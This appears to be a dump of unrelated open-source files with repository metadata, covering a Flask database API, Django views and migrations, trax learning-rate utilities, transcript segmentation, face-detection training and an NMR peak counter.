            lg.info(f'Calling "update_document function" which will insert a single record in table: {table_name}')
            mongodb_object.update_document()
            lg.info('Finally document is updated')
            return jsonify(
                f'Data is updated successfully in table: {table_name} in database: {db_name} of {database_type}')
        # Previously this fell through and returned None (HTTP 500).
        lg.error(f'Unsupported database type: {database_type}')
        return jsonify(f'Unsupported database type: {database_type}. Supported types are mysql and mongodb.')
    lg.error('Only POST requests are supported on this endpoint')
    return jsonify('Only POST requests are supported on this endpoint')
@app.route('/multiple_insert', methods=['POST'])
def multiple_insert():
    """Bulk-insert records into the fixed customer table.

    Expects a JSON body with a 'Database_Type' key ('mysql' or 'mongodb').

    Fix: unknown database types and non-POST calls used to return None
    (Flask 500); they now return an explicit JSON message.
    """
    db_name = 'flask1_database'
    table_name = 'customer_details'
    lg.info(f'Calling multiple insertion function just for inserting a single record into table {table_name}')
    if request.method == 'POST':
        # Which backend the caller wants.
        database_type = request.json['Database_Type']
        if database_type == 'mysql':
            lg.info('User has mention MySql database')
            mysql_object = mysql_db_class(db_name, table_name)
            lg.info(f'Calling "Bulk_insert function" which will insert a single record in table: {table_name}')
            mysql_object.bulk_insert()
            lg.info('Finally table is updated')
            return jsonify(
                f'Bulk Data is inserted successfully in table: {table_name} in database: {db_name} of {database_type}')
        if database_type == 'mongodb':
            lg.info('User has mention Mongodb database')
            mongodb_object = mongo_db_class(db_name, table_name)
            lg.info(
                f'Calling "insert_many_document function" which will insert a single record in table: {table_name}')
            mongodb_object.insert_many_document()
            lg.info('Finally bulk records are inserted in document')
            return jsonify(
                f'Bulk Data is inserted successfully in table: {table_name} in database: {db_name} of {database_type}')
        # Previously this fell through and returned None (HTTP 500).
        lg.error(f'Unsupported database type: {database_type}')
        return jsonify(f'Unsupported database type: {database_type}. Supported types are mysql and mongodb.')
    lg.error('Only POST requests are supported on this endpoint')
    return jsonify('Only POST requests are supported on this endpoint')
@app.route('/delete_data', methods=['POST'])
def delete():
    """Delete records from the fixed customer table.

    Expects a JSON body with a 'Database_Type' key ('mysql' or 'mongodb').

    Fix: unknown database types and non-POST calls used to return None
    (Flask 500); they now return an explicit JSON message.
    """
    db_name = 'flask1_database'
    table_name = 'customer_details'
    lg.info(f'Calling delete function for deleting record into table {table_name}')
    if request.method == 'POST':
        # Which backend the caller wants.
        database_type = request.json['Database_Type']
        if database_type == 'mysql':
            lg.info('User has mention MySql database')
            mysql_object = mysql_db_class(db_name, table_name)
            lg.info(f'Calling "delete_row function" which will insert a single record in table: {table_name}')
            mysql_object.delete_row()
            lg.info('Finally record is deleted')
            return jsonify(
                f'Data is deleted successfully in table: {table_name} in database: {db_name} of {database_type}')
        if database_type == 'mongodb':
            lg.info('User has mention Mongodb database')
            mongodb_object = mongo_db_class(db_name, table_name)
            lg.info(f'Calling "delete_document function" which will delete a document in table: {table_name}')
            mongodb_object.delete_document()
            lg.info('Finally document is deleted')
            return jsonify(
                f'Data is deleted successfully in table: {table_name} in database: {db_name} of {database_type}')
        # Previously this fell through and returned None (HTTP 500).
        lg.error(f'Unsupported database type: {database_type}')
        return jsonify(f'Unsupported database type: {database_type}. Supported types are mysql and mongodb.')
    lg.error('Only POST requests are supported on this endpoint')
    return jsonify('Only POST requests are supported on this endpoint')
@app.route('/download_data', methods=['POST'])
def download():
    """Dump the fixed customer table to a CSV file.

    Expects a JSON body with a 'Database_Type' key ('mysql' or 'mongodb').

    Fix: unknown database types and non-POST calls used to return None
    (Flask 500); they now return an explicit JSON message.
    """
    lg.info('Downloading of a file will be done')
    db_name = 'flask1_database'
    table_name = 'customer_details'
    if request.method == 'POST':
        database_type = request.json['Database_Type']
        if database_type == 'mysql':
            lg.info('File is downloading from mysql database table into some csv file')
            mysql_object = mysql_db_class(db_name, table_name)
            mysql_object.download()
            return jsonify(
                f'Data has been downloaded to csv file from table: {table_name} in database: {db_name} of {database_type}')
        if database_type == 'mongodb':
            lg.info('File is downloading from mongodb database table into some csv file')
            mongodb_object = mongo_db_class(db_name, table_name)
            mongodb_object.download()
            return jsonify(
                f'Data has been downloaded to csv file from table: {table_name} in database: {db_name} of {database_type}')
        # Previously this fell through and returned None (HTTP 500).
        lg.error(f'Unsupported database type: {database_type}')
        return jsonify(f'Unsupported database type: {database_type}. Supported types are mysql and mongodb.')
    lg.error('Only POST requests are supported on this endpoint')
    return jsonify('Only POST requests are supported on this endpoint')
# Script entry point: start the Flask development server in debug mode.
if __name__ == '__main__':
    app.run(debug=True)
    # NOTE(review): executes only after the server stops; presumably flushes
    # and closes the logging handlers — confirm `lg` is the logging module.
    lg.shutdown()
|
[
"noreply@github.com"
] |
shivanshjayara.noreply@github.com
|
a4fd143ac6a588f4c5a3d5b50de9587e087d6074
|
8359d0ade9f5338259e473a53f5482307d14d12f
|
/src/core/jupiter/core/use_cases/big_plans/remove.py
|
75eef43ec1f93e69fa082b54a705e7480212f079
|
[
"MIT"
] |
permissive
|
horia141/jupiter
|
0cba46b1aee24bf73e037335709fa0fce120b097
|
5be2f692e851ce18ad65df40a6c00afc00ae86ae
|
refs/heads/master
| 2023-08-15T16:09:10.631254
| 2023-06-27T05:36:02
| 2023-06-27T05:36:02
| 240,745,415
| 16
| 2
|
MIT
| 2023-09-06T20:44:17
| 2020-02-15T16:12:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,037
|
py
|
"""The command for removing a big plan."""
from dataclasses import dataclass
from jupiter.core.domain.big_plans.service.remove_service import BigPlanRemoveService
from jupiter.core.framework.base.entity_id import EntityId
from jupiter.core.framework.use_case import (
ContextProgressReporter,
UseCaseArgsBase,
)
from jupiter.core.use_cases.infra.use_cases import (
AppLoggedInMutationUseCase,
AppLoggedInUseCaseContext,
)
@dataclass
class BigPlanRemoveArgs(UseCaseArgsBase):
    """Arguments for removing a big plan (was mislabelled 'PersonFindArgs')."""
    ref_id: EntityId
class BigPlanRemoveUseCase(AppLoggedInMutationUseCase[BigPlanRemoveArgs, None]):
    """The command for removing a big plan."""

    async def _execute(
        self,
        progress_reporter: ContextProgressReporter,
        context: AppLoggedInUseCaseContext,
        args: BigPlanRemoveArgs,
    ) -> None:
        """Execute the command's action."""
        # Delegate the actual removal to the domain-level service.
        remove_service = BigPlanRemoveService(self._storage_engine)
        await remove_service.remove(
            progress_reporter, context.workspace, args.ref_id
        )
|
[
"horia141@gmail.com"
] |
horia141@gmail.com
|
49ee8bc9cf6de2e556cd422f44a0a4c69fe2bc91
|
5b35d91bd83faa9d8cd9acef8d4fe87f07455bf5
|
/userauth/basicapp/views.py
|
fedcce68ece0d1e415c8ef505b4f89ce6a0b61f2
|
[] |
no_license
|
akshaykalucha/django-auth-forms
|
1d5c7c86e358fbedc1f373c58920df63ad8afc49
|
5562a259a0d5c9c022839c4eef6a9517fccc2e61
|
refs/heads/master
| 2022-09-23T00:10:33.004793
| 2019-06-02T18:34:53
| 2019-06-02T18:34:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
from django.shortcuts import render
from .models import Contact
def index(request):
    """Landing page; on POST, persist the submitted contact message."""
    if request.method == 'POST':
        contact = Contact(
            email=request.POST.get('email'),
            message=request.POST.get('message'),
        )
        contact.save()
    # The same template is rendered for both GET and POST.
    return render(request, 'basicapp/index.htm')
# Create your views here.
|
[
"akshaykalucha@gmail.com"
] |
akshaykalucha@gmail.com
|
51497c27b205b81f1442f42dbecaaa0425b9188c
|
a81eb1d8decb2319a76778f4cfbd5624aaf0919b
|
/trax/rl/envs/online_tune.py
|
bcef89fe032444d83f9d88545f5308b1869d94a5
|
[
"Apache-2.0"
] |
permissive
|
modyharshit23/trax
|
9beecf9ec950d50b481d000cf8de50e41db95c30
|
2e6783a4674209b57482ec41e1c533a420aa6fe6
|
refs/heads/master
| 2020-08-07T19:34:23.943648
| 2019-10-08T06:39:01
| 2019-10-08T06:39:01
| 213,566,294
| 0
| 0
|
Apache-2.0
| 2019-10-08T06:36:36
| 2019-10-08T06:36:36
| null |
UTF-8
|
Python
| false
| false
| 2,086
|
py
|
# coding=utf-8
# Copyright 2019 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for OnlineTuneEnv."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
# (mode, metric-name) pair addressing the learning-rate stream in a History.
LEARNING_RATE_METRIC = ("train", "training/learning_rate")
def historical_metric_values(
    history, metric, observation_range=(-np.inf, np.inf)):
  """Converts a metric stream from a trax History object into a numpy array."""
  # history.get(*metric) yields (step, value) pairs; keep the values only.
  values = np.array([value for (_, value) in history.get(*metric)])
  # Clamp every value into the requested observation range.
  return np.clip(values, *observation_range)
def history_to_observations(history, metrics, observation_range, include_lr):
  """Converts a trax History object into a sequence of observations."""
  # One clipped column per requested metric.
  columns = [
      historical_metric_values(history, m, observation_range)
      for m in metrics
  ]
  if include_lr:
    # Logarithm of the learning rate.
    lr_values = historical_metric_values(
        history, LEARNING_RATE_METRIC, observation_range)
    columns.append(np.log(lr_values))
  return np.stack(columns, axis=1)
def new_learning_rate(action, history, action_multipliers, max_lr):
  """Calculates a new learning rate based on an action."""
  past_lrs = historical_metric_values(history, LEARNING_RATE_METRIC)
  assert past_lrs.shape[0] > 0, "No last learning rate found in history."
  # Scale the most recent learning rate, capped at max_lr.
  candidate = past_lrs[-1] * action_multipliers[action]
  return min(candidate, max_lr)
|
[
"afrozm@google.com"
] |
afrozm@google.com
|
ffcbae29cb8d77f2e922cd933f47cef28b20c062
|
60d3c8f118c7fe3cade97165377c968c36ae4e81
|
/hask_ideas/Data/Traversable.py
|
8dbc037de79772a058515fb6cc70d90fb0fbd922
|
[
"BSD-2-Clause",
"MIT"
] |
permissive
|
billpmurphy/hask-archive
|
d6e7363dd6086ebeabf4c0c7713c1cc2e446c4a5
|
1dbecd7070cdf6e946df4236688c46ccd70d329b
|
refs/heads/master
| 2021-01-24T15:22:59.416785
| 2015-08-10T19:04:26
| 2015-08-10T19:04:26
| 33,465,919
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 778
|
py
|
from ..lang import build_instance
from ..Control.Applicative import Applicative
from ..Control.Monad import Monad
from Foldable import Foldable
from Functor import Functor
class Traversable(Foldable, Functor):
    """
    Functors representing data structures that can be traversed from left to
    right.

    Dependencies:
        Foldable, Functor

    Attributes:
        traverse, sequenceA, mapM, sequence

    Minimal complete definition:
        traverse
    """
    @classmethod
    def make_instance(typeclass, cls, traverse, sequenceA=None, mapM=None,
                      sequence=None):
        # Register the supplied implementations for this typeclass instance.
        instance_attrs = dict(traverse=traverse, sequenceA=sequenceA,
                              mapM=mapM, sequence=sequence)
        build_instance(Traversable, cls, instance_attrs)
|
[
"billpmurphy92@gmail.com"
] |
billpmurphy92@gmail.com
|
b2851b1a304be6b047b9a8356ef027bc98cc0f95
|
f9ed608c620093b9f6b5058bcedf7ae610c09c8d
|
/953-Verifying_an_Alien_Dictionary.py
|
b29bd1cd3017ead5212ad421027fb92b3d98447b
|
[] |
no_license
|
chanyoonzhu/leetcode-python
|
9b88d7f2749e1ae3ed597759b1bf9f7fa4912c35
|
085d868ba0458fc8e6b5549aa00fa151c335fa7f
|
refs/heads/master
| 2022-05-24T11:20:35.927915
| 2022-04-16T06:02:33
| 2022-04-16T06:02:33
| 166,224,197
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
"""
- array sorting + hashmap
"""
class Solution:
    def isAlienSorted(self, words: List[str], order: str) -> bool:
        """True iff `words` is sorted lexicographically under `order`."""
        rank = {ch: pos for pos, ch in enumerate(order)}
        for prev, cur in zip(words, words[1:]):
            # A strict prefix must come first; a longer word before its
            # own prefix is out of order.
            if len(prev) > len(cur) and prev[:len(cur)] == cur:
                return False
            for c1, c2 in zip(prev, cur):
                if rank[c1] != rank[c2]:
                    if rank[c1] > rank[c2]:
                        return False
                    break
        return True
"""
- short version
"""
class Solution:
    def isAlienSorted(self, words, order):
        """True iff `words` is sorted lexicographically under `order`."""
        rank = {letter: position for position, letter in enumerate(order)}
        # Translate each word into its sequence of alien ranks, then check
        # that consecutive translated words are non-decreasing.
        translated = [[rank[letter] for letter in word] for word in words]
        return all(a <= b for a, b in zip(translated, translated[1:]))
|
[
"zhuchanyoon@gmail.com"
] |
zhuchanyoon@gmail.com
|
aba602a73bce2f3d700ad3f704a27f5a026008bd
|
fea398a9638acdfa2fb06e7a9695d5894452ded7
|
/0x07-python-test_driven_development/3-say_my_name.py
|
b408ac9688f6adf53264cf935daaaaf536e3d9a1
|
[] |
no_license
|
OscarDRT/holbertonschool-higher_level_programming
|
d15585aa93ced9bc04464ced9bfd4197e73c42fa
|
f57ef3344df6350bded78ffce975eea693e67727
|
refs/heads/master
| 2020-09-30T19:56:30.788311
| 2020-05-14T19:52:10
| 2020-05-14T19:52:10
| 227,360,960
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 581
|
py
|
#!/usr/bin/python3
"""Function that prints My name is <first name> <last name>
first_name and last_name must be strings otherwise,
raise a TypeError exception with the message
first_name must be a string or last_name must be a string
"""
def say_my_name(first_name, last_name=""):
    """Print ``My name is <first_name> <last_name>``.

    Args:
        first_name (str): required first name.
        last_name (str): optional last name (defaults to "").

    Raises:
        TypeError: if either argument is not a string.
    """
    # isinstance is the idiomatic type check (type(x) != str also rejected
    # str subclasses).
    if not isinstance(first_name, str):
        raise TypeError("first_name must be a string")
    if not isinstance(last_name, str):
        raise TypeError("last_name must be a string")
    print('My name is', first_name, last_name)
|
[
"oscarnetworkingpro@gmail.com"
] |
oscarnetworkingpro@gmail.com
|
d3f804833db7e3655c2793a2465fc9a003792e38
|
625bcba8922a6d0bd4c34721354f1f87977437ad
|
/scripts/transform_ushmm_transcripts/get_text_units.py
|
ad0900650bcf18113474a0b44ae2fee962df5179
|
[] |
no_license
|
toth12/data_processing_lts
|
2970805d101154b5aa2283061da970d45538571a
|
831c3d3ccfd745606f4cc855623086b3d3c07a01
|
refs/heads/master
| 2023-04-16T06:19:18.410693
| 2021-05-04T07:55:53
| 2021-05-04T07:55:53
| 353,973,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,472
|
py
|
import sys, glob, os
root_path = os.path.join("..", "..")
sys.path.insert(0, root_path)
from docx import Document
from subprocess import call
import pprint
import constants
import re
import pdb
import os,sys
helper_path = os.path.join("..", "..", "utils")
sys.path.insert(0, helper_path)
import helper_mongo as h
import text
import folia_utils
import pdb
from data_spec import create_dictionary_of_file_list
import constants
from string import Template
import commands
import heapq
# Database name and progress-tracker collection used by this pipeline.
DB=constants.DB
TRACKER="USHMM_transcript_processing_progress_test"
# File listing the testimony ids to process (one id per line).
SAMPLE_FILE='scripts/transform_ushmm_transcripts/sample_data/input_ids.txt'
# Root folder holding the source .doc/.docx transcripts.
INPUT_FOLDER='/Users/gmt28/Documents/Workspace/Docker_Engine/varad/Yale_Projects/shoah-foundation-data-restored/shoah-foundation-data/data/inputs/ushmm/transcripts/microsoft_doc_docx/'
def getTextUnits(filename):
    """Split a .docx transcript into a list of {'unit': text} segments.

    A new unit starts whenever a paragraph begins with a known marker:
    a question/answer prefix, a timestamp, a track label or a speaker tag.
    Marker-less paragraphs are appended to the previous unit when that unit
    looks like an unfinished sentence, otherwise they start a new unit.
    Empty paragraphs are skipped.
    """
    doc = Document(filename)
    units = list()
    # Known segmentation markers (regexes and literal prefixes).
    regex_units = [r'track [0-9][0-9]', r'[A-Z][A-Z]?[.|:|-]',
                   r'[0-9]?[0-9]:[0-9][0-9]:[0-9][0-9]', r'\[[A-Z][A-Z]\]']
    question_units = ["Question:", "Q:", "Q."]
    answer_units = ["Answer:", 'A:', 'A.']
    # Prefixes that match a marker regex but must not start a unit.
    non_units = ["name:", "date:", "date", "series", "transcriber", "thesis:",
                 "currently:", "note", "comment", "grandparents:",
                 "transcript:", "note:", "Interviewer:", "Theodore:",
                 "mr.", "Mr.", "[DL]", "[AG]", "[BB]"]
    for para in doc.paragraphs:
        paragraph = para.text.strip()
        presence_regex_unit = False
        presence_answer_unit = False
        presence_question_unit = False
        if len(paragraph) > 0:
            # Only the first few characters can carry a marker.
            first_words = paragraph[0:10]
            for element in question_units:
                if element in first_words:
                    presence_question_unit = True
                    break
            if not presence_question_unit:
                for element in answer_units:
                    if element in first_words:
                        presence_answer_unit = True
                        break
            # Regex markers are only checked when no answer marker was found
            # (same short-circuit structure as the original).
            if not presence_answer_unit:
                for element in regex_units:
                    n = re.compile(element)
                    typer2 = n.match(first_words)
                    if typer2 and (first_words not in non_units):
                        presence_regex_unit = True
                        break
            if presence_regex_unit or presence_answer_unit or presence_question_unit:
                units.append({'unit': paragraph})
            elif (len(units) > 0 and len(paragraph.split()) > 3):
                # BUG FIX: the original compared the token *list* to 3
                # (units[-1]['unit'].split() > 3), which is always True in
                # Python 2; the word count was intended.
                if (len(units[-1]['unit'].split()) > 3
                        and units[-1]['unit'][-1] not in ['?', '.', '!']):
                    # Previous unit looks unfinished: merge this paragraph in.
                    units[-1]['unit'] = units[-1]['unit'] + ' ' + paragraph
                else:
                    units.append({'unit': paragraph})
            else:
                units.append({'unit': paragraph})
    return units
def main():
    # Read testimony ids, segment each transcript with getTextUnits and
    # store the combined unit list under
    # output_ushmm_metadata.structured_transcript (Python 2 script).
    ids=open(SAMPLE_FILE).readlines()
    all_files=[]
    for testimony_id in ids:
        # Look up the transcript file names recorded for this testimony.
        result=h.query(DB,TRACKER,{'id':testimony_id.strip()},{'microsoft_doc_file':1,'method':1,'id':1,'_id':0})[0]
        all_files.append(result)
    for element in all_files:
        name=element['microsoft_doc_file'][0]
        print element['id']
        # Legacy .doc files need a .docx conversion before python-docx can read them.
        if name.split('.')[-1]=='doc':
            result=[]
            for files in element['microsoft_doc_file']:
                file=INPUT_FOLDER+ files
                # NOTE(review): this textutil command is built but never
                # executed (no call(command)); presumably the conversion ran
                # in an earlier pass — confirm, otherwise the .docx path
                # below will not exist.
                command = 'textutil -convert docx ' + file + ' -output ' + os.getcwd()+'/sample_data/'+files+'x'
                file=os.getcwd()+'/scripts/transform_ushmm_transcripts/sample_data/'+files+'x'
                units=getTextUnits(file)
                # Collapse internal whitespace inside every unit.
                for i,unit in enumerate(units):
                    units[i]['unit']=' '.join(unit['unit'].split())
                result.extend(units)
            h.update_field(DB, 'output_ushmm_metadata', "testimony_id", element['id'], "structured_transcript", result)
        else:
            result=[]
            for file in element['microsoft_doc_file']:
                file=INPUT_FOLDER+file
                units=getTextUnits(file)
                # Collapse internal whitespace inside every unit.
                for i,unit in enumerate(units):
                    units[i]['unit']=' '.join(unit['unit'].split())
                result.extend(units)
            h.update_field(DB, 'output_ushmm_metadata', "testimony_id", element['id'], "structured_transcript", result)
# Script entry point.
if __name__ == '__main__':
    main()
|
[
"gabor.toth@yale.edu"
] |
gabor.toth@yale.edu
|
7f4c175b19ad6ad75136ed55c2d937ad98f43682
|
ffadd004f779aa6aca925d8d39775a8bd8abfc37
|
/yolo_face/TrainYamlModel.py
|
5fe750404fbe4ec97a5249753b2cd88f76fb7593
|
[] |
no_license
|
xinyunmian/face-detection
|
9b111f82916bd75ae2e2e9036f69d0ed2b0539a8
|
615c90284f3283c4764c5851e66a7a47ae0f7494
|
refs/heads/main
| 2023-08-25T18:59:23.164984
| 2021-09-13T07:27:19
| 2021-09-13T07:27:19
| 405,872,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,681
|
py
|
import torch
import os
import random
import numpy as np
import torch.utils.data as data
from FaceDataLoader import LoadFace, collate_face
from ParseYamlModel import Yaml2Pytorch
from FaceConfig import facecfg
from FaceLoss import compute_FaceLoss
# cuda: pin all subsequent CUDA allocations and kernels to GPU 0.
torch.cuda.set_device(0)
def adjust_learning_rate(epoch, optimizer):
    """Step-decay schedule: shrink the base LR by larger factors as epochs pass."""
    # (epoch boundary, divisor) pairs, checked from the highest boundary down;
    # the first boundary the epoch exceeds wins.
    schedule = ((650, 1000000), (600, 100000), (550, 10000),
                (350, 1000), (180, 100), (20, 10))
    lr = facecfg.lr
    for boundary, divisor in schedule:
        if epoch > boundary:
            lr = lr / divisor
            break
    # Push the new rate into every parameter group.
    for group in optimizer.param_groups:
        group["lr"] = lr
def train():
    """Train the YAML-described face detector on the configured dataset."""
    # Data pipeline: custom dataset plus a collate function that batches faces.
    data_train = LoadFace(img_path=facecfg.data_list, cfg=facecfg)
    train_loader = data.DataLoader(data_train, batch_size=facecfg.batch_size, shuffle=True, num_workers=0, collate_fn=collate_face)
    # Build the network from its YAML description; anchors reshaped to
    # 3 scales x 3 boxes x (w, h).
    net = Yaml2Pytorch(cfg=facecfg.model_yaml)
    anchors = net.yaml["anchors"]
    anchors = np.array(anchors, np.float32).reshape([3, 3, 2])
    if facecfg.pretrain:
        # Load pretrained weights onto CPU first, then move the net to GPU.
        d_dict = torch.load(facecfg.pretrain_weights, map_location=lambda storage, loc: storage)
        net.load_state_dict(d_dict)
    net.cuda()
    optimizer = torch.optim.SGD(net.parameters(), lr=facecfg.lr, weight_decay=facecfg.weight_decay, momentum=0.9)
    net.train()
    for epoch in range(facecfg.start_epoch, facecfg.epochs):
        print("Epoch {}".format(epoch))
        print('I am training, please wait...')
        batch = 0
        lr_cur = 0.01
        for i, (imgs, targets, paths, _) in enumerate(train_loader):
            imgs = imgs.cuda().float() / 255.0  # uint8 to float32, 0-255 to 0.0-1.0
            targets = targets.cuda()
            outs = net(imgs)
            # lall holds the individual loss terms: box, objectness, class, landmarks.
            loss, lall = compute_FaceLoss(outs, targets, anchors, wh_r=facecfg.anchor_box_ratio, downs=facecfg.strides, not_yaml=False)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            batch += 1
            # Read back the current learning rate for progress reporting.
            for params in optimizer.param_groups:
                lr_cur = params['lr']
            if batch % 5 == 0:
                print("Epoch:{}/{} || Loss:{:.4f} || Box:{:.4f} || Obj:{:.4f} || Class:{:.4f} || Landmks:{:.4f} || LR: {:.8f}"
                      .format(epoch, facecfg.epochs, loss.item(), lall[0].item(), lall[1].item(),lall[2].item(),lall[3].item(), lr_cur))
        # Apply the step-decay learning-rate schedule for the next epoch.
        adjust_learning_rate(epoch, optimizer)
        # Checkpoint every second epoch.
        if (epoch % 2 == 0 and epoch > 0):
            torch.save(net.state_dict(), facecfg.model_save + "/" + "FaceShuffle_{}.pth".format(epoch))
# Script entry point: launch training.
if __name__ == "__main__":
    train()
|
[
"18806181003@163.com"
] |
18806181003@163.com
|
472971efc2470876da78591fcbfce41064a3e72b
|
5e64a98207ac9a8ffcc1ab25fc3715bb898d3a65
|
/tests/json.tst.py
|
ae1bba4be20cb244ea93b306bd1a6124082a3c65
|
[] |
no_license
|
chernevik/python-sanity
|
9de267cb125a82ad336892ec5b6cb736a23bc430
|
849f212df509420d2b83c87d29a73faf13a7d477
|
refs/heads/master
| 2021-01-18T14:06:32.026238
| 2012-04-06T00:34:49
| 2012-04-06T00:34:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,060
|
py
|
#/usr/bin/python
# -*- coding: utf-8
#=============================================================================
# Imports
import unittest2
import sanity.formats.json_format as specificier
#=============================================================================
class SpecifierTest(unittest2.TestCase):
    #---------------------------------------------------------------------
    def test_basic(self):
        """Smoke-test loading the 'basic.json' spec fixture."""
        spec = specificier.Specificier(spec='basic.json')
        self.assertIsInstance(spec.json, dict)
        self.assertEqual('WitchOrDuck', spec.json['TestName'])
        self.assertEqual('WitchOrDuck', spec.TestName)
        self.assertEqual(
            {u'url': u'/', u'method': u'GET'},
            spec.request
        )
    #---------------------------------------------------------------------
#=============================================================================
# Allow running this test module directly.
if __name__ == '__main__':
    unittest2.main()
#=============================================================================
|
[
"gordon@practicalhorseshoeing.com"
] |
gordon@practicalhorseshoeing.com
|
c2434b2fb11ee9aa0070bcf9e30821461857f313
|
6a898e59343d0b3ea4f9580f489ef76d888b2b7e
|
/ecommerce/migrations/0028_auto_20180511_0449.py
|
cbda4df1aaf00a8a9f7564b2bb435064e9fe1db2
|
[] |
no_license
|
oujri/ecommerce
|
4b08b0316671e24206e810a38728d71c77fdc396
|
3fd8095dd2ed771a6951ed7fff08ca11ef0b94a1
|
refs/heads/master
| 2020-03-19T03:39:36.002373
| 2018-06-01T22:09:31
| 2018-06-01T22:09:31
| 135,749,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 845
|
py
|
# Generated by Django 2.0.4 on 2018-05-11 03:49
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: drops the generic Address->user link and adds
    # one-to-one user links (to ecommerce.Profil) on BillingAddress and
    # ShippingAddress instead.

    dependencies = [
        ('ecommerce', '0027_auto_20180511_0424'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='address',
            name='user',
        ),
        migrations.AddField(
            model_name='billingaddress',
            name='user',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='ecommerce.Profil'),
        ),
        migrations.AddField(
            model_name='shippingaddress',
            name='user',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='ecommerce.Profil'),
        ),
    ]
|
[
"anass.urh@outlook.fr"
] |
anass.urh@outlook.fr
|
2f499a87544c0540ba44690864ef78272d33db8b
|
d90af0def0e29ebaebcf986399fcee65e1e2916c
|
/com_alias/noeout2txt
|
40e55f474367f57e12461898d4f86a7f367a2b25
|
[] |
no_license
|
Zaiyong/csrosetta
|
2fdbbdd7da24ce971f7f2297a7cd14723cdd59d6
|
539c60664dba3972062002ff4e636c7f029927cb
|
refs/heads/master
| 2020-12-25T15:18:39.274689
| 2020-02-25T09:15:35
| 2020-02-25T09:15:35
| 65,408,072
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,184
|
#!/usr/bin/env python2.7
##-*- mode:python;tab-width:2;indent-tabs-mode:t;show-trailing-whitespace:t;rm-trailing-spaces:t;python-indent:2 -*-'
from os.path import basename
import os
import string
import argparse
import sys
#sys.path.append('/home/zak/Downloads/numpy-1.6.2')
import library
import StringIO
from assignment import noesy
from math import *
#from noesy import CrossPeakInfo
#from noesy import CrossPeakList
#from noesy import Resonance
#from noesy import ResonanceList
from assignment.noesy import SpinSystem, get_strips,spinsystem_evaluation,ResonanceBase, ResonanceList
import fasta
import copy
from sets import Set
# Command-line interface: which assigned peak lists to summarize and how
# deeply to break the per-file statistics down.
parser =argparse.ArgumentParser(description="assign noesy peaks",
                                add_help=True)
parser.add_argument("-peaks",nargs='*', help='NOE_out.dat with assigned peak-lists in xeasy format',default=None);
# NOTE(review): -split and -split_level both write dest 'split_level'; the
# later default (0) wins when neither flag is given — confirm intended.
parser.add_argument("-split", type=int, dest='split_level', default=None);
parser.add_argument("-split_level", type=int, help='how deep should we split into individual file-names',default=0 );
parser.add_argument("-min_vc", default=0.5, type=float, help='in the last stage of autoNOE-Rosetta assignments with a volume contribution of less than 0.5 are usually ignored' )
library.add_standard_args( parser )
args = parser.parse_args()
class PeakCounter:
  """Base class for the report counters: indentation handling plus the
  two hooks (count_peak, show_counter) that subclasses override."""
  def __init__(self,indent=0):
    # Left margin (spaces) for this counter's report line.
    self._indent=indent
    # Column at which the numeric value starts in the report.
    self._VALUE_COL=80
  def count_peak(self,p):
    # Hook: inspect one cross peak; overridden by subclasses.
    pass
  def show_counter(self):
    # Hook: display results; overridden by subclasses.
    pass
  def set_indent(self,val):
    self._indent=val
  def get_indent(self):
    return self._indent
  def str_indented(self,text,offset = 0,fillchar='.'):
    # Return `text` indented and padded with `fillchar` out to the value
    # column, followed by '| '. Parameter renamed from `str`, which
    # shadowed the builtin; every caller in this file passes it positionally.
    indent=self._indent+offset
    s=' '*indent+text
    fill=self._VALUE_COL-len(s)
    s+=fillchar*fill+'| '
    return s
class FileNameCounter(PeakCounter):
  """Tallies counted peaks per originating experiment/file.

  Python 2 code (iteritems/itervalues); per-file report order follows
  dict iteration order.
  """
  def __init__(self,indent):
    PeakCounter.__init__(self,indent)
    # experiment id -> number of peaks counted from that file
    self.files={}
  def count_peak(self,p):
    file=p.info().experiment_id()
    self.files.setdefault(file,0)
    self.files[file]+=1
  def sum_count(self):
    # Total count across all files.
    sum = 0
    for v in self.files.itervalues():
      sum+=v
    return sum
  def __str__(self):
    # Per-file breakdown; suppressed once the nesting (indent) exceeds
    # the depth allowed by the -split_level command-line option.
    s=''
    if args.split_level==None or (args.split_level+1)*2>self.get_indent():
      for f,v in self.files.iteritems():
        s+='\n'+self.str_indented('in '+f,offset=2,fillchar=' ')+'%8d'%v
    return s
class SimplePeakCounter(PeakCounter,FileNameCounter):
  """Counts peaks satisfying a single predicate (the applies() hook).

  Fix: the original defined __str__ twice; the first definition was dead
  (immediately shadowed by the second) and wrongly delegated to
  CompoundCounter.__str__, which is not a base of this class. The dead
  definition has been removed; the surviving behavior is unchanged.
  """
  def __init__(self,indent,name):
    PeakCounter.__init__(self,indent)
    FileNameCounter.__init__(self,indent)
    self._name=name
    self._count=0
  def count_peak(self,p):
    # Count the peak (and its source file) when the predicate holds.
    if self.applies(p):
      self._count+=1
      FileNameCounter.count_peak(self,p)
      return True
    return False
  def applies(self,p):
    # Abstract hook: subclasses decide whether peak p qualifies.
    pass
  def __str__(self):
    s=self.str_indented(self._name)
    s+='%8d'%self._count
    s+=FileNameCounter.__str__(self)
    return s
  def count(self):
    return self._count
